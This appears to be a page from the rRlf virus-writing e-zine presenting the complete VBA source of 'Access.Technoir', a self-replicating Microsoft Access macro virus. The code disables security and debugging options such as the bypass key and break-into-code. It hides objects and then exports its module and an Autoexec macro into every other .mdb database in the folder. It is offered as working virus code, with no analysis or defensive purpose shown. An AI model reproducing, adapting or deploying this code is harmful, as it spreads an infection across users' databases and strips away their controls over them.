<html>
<head>
<title>rRlf #4</title>
</head>
<body text="#ffffff" link="#ff0f0f" vlink="#ff0f0f" alink="#ff0f0f" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Redemption</i>
<br><table cellpadding="9">
<tr>
<th><a href="rRlf.43.html">Last article</a></th>
<th><a href="rRlf.01.html">Table of contents</a></th>
<th><a href="rRlf.45.html">Next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - Macro.Access.Technoir by Necronomikon</u></b>
<p><pre>
Attribute VB_Name = "technoir"
Option Compare Database
Option Explicit

Function THC()
On Error Resume Next
'Virus Name: Technoir
'Virus Author: Necronomikon
Dim victim, necro, whoami As String
DoCmd.SetWarnings (0)
Application.SetOption "Show Hidden Objects", False
CurrentDb.Properties("AllowBypassKey") = 55 Xor 55
CurrentDb.Properties("AllowSpecialKeys") = 44 Xor 44
CurrentDb.Properties("AllowBreakIntoCode") = 33 Xor 33
CommandBars("Tools").Controls("Optionen...").Enabled = 11 Xor 11
necro = False
victim = Dir("*.mdb", vbNormal)
If victim <> "" Then
whoami = CurrentDb.Name
If whoami = victim Then necro = True
If necro = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", victim, acModule, "technoir", "technoir"
If necro = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", victim, acMacro, "Autoexec", "Autoexec "
While victim <> ""
victim = Dir
If whoami = victim Then necro = True
If necro = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", victim, acModule, "technoir", "technoir"
If necro = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", victim, acMacro, "Autoexec", "Autoexec "
Wend
MsgBox "Access.Technoir", "(c) by Necronomikon/Zer0Gravity"
End If
End Function

</pre>
</body>
</html>
